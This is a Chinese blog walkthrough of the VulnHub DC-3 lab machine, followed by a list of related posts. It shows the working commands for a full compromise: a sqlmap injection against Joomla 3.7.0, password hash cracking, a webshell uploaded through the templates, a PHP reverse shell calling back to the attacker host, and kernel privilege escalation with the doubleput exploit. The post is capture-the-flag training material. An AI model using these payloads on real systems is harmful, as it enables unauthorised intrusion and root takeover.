靶机-DC3

已于 2023-11-27 20:14:00 修改
阅读量864 收藏 17
点赞数 16
分类专栏: 靶机 文章标签: 网络 安全
于 2023-11-27 20:13:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44796547/article/details/134653340
版权

查找靶机IP

在这里插入图片描述

端口扫描

在这里插入图片描述

目录扫描

在这里插入图片描述

找到两个可访问链接

http://192.168.254.3/index.php

在这里插入图片描述

http://192.168.254.3/administrator/

在这里插入图片描述

看一下指纹

在这里插入图片描述

在这里插入图片描述

确定有joomla

JoomScan安装
1、更新apt
sudo apt update
2、安装joomscan
sudo apt install joomscan

使用joomscan来扫描DC-3

joomscan -u 192.168.254.3

发现joomla版本 3.7.0

在这里插入图片描述

查找漏洞利用

在这里插入图片描述

将模块复制到当前目录

searchsploit -m 42033.txt
在这里插入图片描述

查看

在这里插入图片描述

看到sqlmap 语句

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

将localhost改成靶机IP

在这里插入图片描述

爆表

python sqlmap.py -u “http://192.168.254.3/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --tables -D joomladb -p list[fullordering]
在这里插入图片描述

查表

在这里插入图片描述

查字段

在这里插入图片描述

admin$2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zuadmin

john破解

在这里插入图片描述

snoopy

所以:用户名密码:admin,snoopy

在http://192.168.254.3/index.php发现编写处,发现有过滤,跳过

在这里插入图片描述

http://192.168.254.3/administrator/index.php

发现文件上传

在这里插入图片描述

在这里插入图片描述

在Joomla框架中,Templates是直接存在于根目录下的,于是我们进行访问查看一句话木马是否上传成功,我们进入网站查看测试。

http://192.168.254.3/templates/beez3/shell.php

蚁剑连接

发现常规反弹不了,通过php文件反弹

<?php
system ("bash -c 'sh -i >& /dev/tcp/192.168.254.6/4444 0>&1'");
?>

蚁剑上传

在这里插入图片描述

反弹成功

在这里插入图片描述

变成交互shell界面

python -c 'import pty;pty.spawn("/bin/bash")'

sudo -l什么都没有

cat /etc/issue查看版本
在这里插入图片描述

发现Ubuntu版本

发现一个提权漏洞(Privilege Escalation 特权升级)

在这里插入图片描述

python3 -m http.server 8088

在这里插入图片描述

访问网页

http://192.168.254.6:8088/39772.txt

在这里插入图片描述

出现这个说明服务开启成功

接着我们下载该压缩包并放到kali桌面里,解压该文件,然后在桌面开启http服务,将下载好的文件导入到DC-3靶机里

在这里插入图片描述

在这里插入图片描述

直接提取是报错:装入归档文件时出现了一个错误
解决办法
用一下命令解压

┌──(root💀kali)-[~]
└─#jar xvf 39772.zip
Ick! 0xa0a0a0a
┌──(root💀kali)-[~]
└─# unzip -n 39772.zip

exp地址是

http://http://192.168.254.6:8088//39772/39772/exploit.tar

回到我们的虚拟终端,利用wget命令下载该工具

wget http://http://192.168.254.6:8088//39772/39772/exploit.tar

这里我直接用蚁剑上传

在这里插入图片描述

在shell中进行解压。

tar -xvf exploit.tar

在这里插入图片描述

进入解压后的目录中,按照searchsploit工具中的提示进行提权。

cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
./doubleput
在这里插入图片描述

获得root权限,找到flag

在这里插入图片描述

随风随梦自在逍遥
关注
  • 16
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC3靶机
qq_40646572的博客
04-25 518
DC3靶机挑战
DC-3靶机
m0_57954651的博客
10-01 1847
保存就上传 然后进行测试访问 (再根据joomla的特性 模块会单独放在一个文件夹里/templates/ 而beez3模块就在/templates/beez3/里面 刚才创建的webshell路径为)http://192.168.47.150/templates/beez3/shell.php。文本写的是漏洞产生的原因 描述和漏洞利用的方法 还附上了exp 最后一行的连接 (执行下两个文件 Linux系统下.(点)是执行某个文件的意思 (./compile.sh)
DC3靶机
PigLL的博客
08-11 409
## 关于DC3 靶机实验 1.信息收集: 2.网站信息 在浏览器中访问DC3的IP 利用工具kali中的nikto做一个简单的信息识别 通过扫描可以看到一些目录 然后通过浏览器可以访问 然后利用joomla专用的扫描工具joomscan扫描 发现了joomla的版本和一些目录 通过kali中的工具searchsploit扫描joomla 3.7.0版本存在的漏洞 通过扫描发现了一个42033.txt文件 通过searchsploit 将42033文件下载到当前目录 查看42033文件 发现
vulnhub之DC3靶机
LainWith的博客
08-11 2062
靶机概览信息收集nmap信息收集网站信息收集查找漏洞漏洞描述渗透攻击SQL注入攻击获取当前数据库的名字获取当前数据库的表名获取指定数据库的字段名获取目标字段密码破解getshell寻找上传点 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-3,312/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
渗透测试:DC-3靶机
Ciyaso的博客
08-16 440
零、修改网卡 扫不到iP需要修改网卡 打卡DC-3时进入这个界面按e键 然后找到g–root 将其后面的值从ro改成rw signie init=/bin/bash 按下Ctrl键+X键进入命令行 查看当前网卡IP信息 ip a,网卡名ens33 编辑网卡配置文件vim /etc/network/interfaces 重启网卡服务/etc/init.d/networking restart,再看看ip a 发现已有ip 一、扫描获取靶机ip arp-scan -l 192.168.203.1
渗透测试学习之靶机DC-3
xdbzdgx的博客
11-12 4246
1.下载靶机 本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。 在VMware加载成功之后显示如下界面: 默.
【Vulnhub靶机系列】DC3
zhangge3663的博客
05-05 143
基本信息 Kali:192.168.61.145 DC3:192.168.61.163 实验过程 同样先通过arpscan扫描找出DC3的IP地址 sudo arp‐scan ‐‐interface eth0 192.168.61.1/24 这里可以直接看出DC3的IP地址为192.168.61.163 然后我们使用nmap对目标进行扫描 发现目标主机只是打开了80端口 然后我们查看下80端口,通过wappalyzer,发现用的是Jooml...
Vulnhub DC-3靶机渗透测试(DC系列)
Alexhirchi的博客
10-11 908
每日学习~ 冲冲冲 VulnHub 入门DC系列之DC-1 说明 靶场下载地址:https://www.vulnhub.com/entry/dc-32,312/ 渗透靶场:VirtualBox 攻击靶机:本地机+kail(VMware) Flag:5个 启动DC-1靶机,界面显示登录界面,这是正常运行情况,我们也并没有登录账号,需要自己去渗透测试进行提权。回到我们的攻击机 ...
靶机渗透DC-3
weixin_44801963的博客
11-01 257
文章目录一、环境准备KaliDC-3二、渗透步骤1、信息收集2、漏洞探测3、漏洞利用1、SQL注入漏洞利用2、任意文件执行漏洞4、权限提升5、Get flag三、Have Fun 一、环境准备 Kali DC-3 下载官网:https://www.five86.com/ 二、渗透步骤 1、信息收集 主机发现 目标端口扫描 访问80服务 网站指纹识别 Joomla CMS扫描 扫除管理员登录界面 . 2、漏洞探测 查询 joomla 3.7.0已知的漏洞 3、漏洞利用 1、SQL注入漏洞利用
DC-3靶机攻略
weixin_47311099的博客
07-16 433
DC-3攻略 信息收集 主机发现 nmap -sP 192.168.64.0/24 -oN nmap.sP 端口扫描 nmap -A 192.168.64.137 -p 1-65535 -oN NMAP_A 发现开放80端口 访问80 漏洞利用 安装joomla扫描工具joomscan apt-get install joomscan 查找cms版本漏洞 searchsploit Joomla 3.7.0 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WEXzKK0O-
CTF靶机 DC-3
weixin_52221158的博客
09-02 827
CTF靶场 DC-3详细讲解
七 vulnhub系列 DC3靶机
devil8123665的博客
07-27 175
sqlmap注入语句 1暴库 sqlmap -u "http://192.168.190.188/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1" --dbs -p list[fullordering] --batch 2 暴表 sqlmap -u "http://192.168.190.188/index.php?option=com_fields&view=field
vulnhub靶机-jangow: 1.0.1
最新发布
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值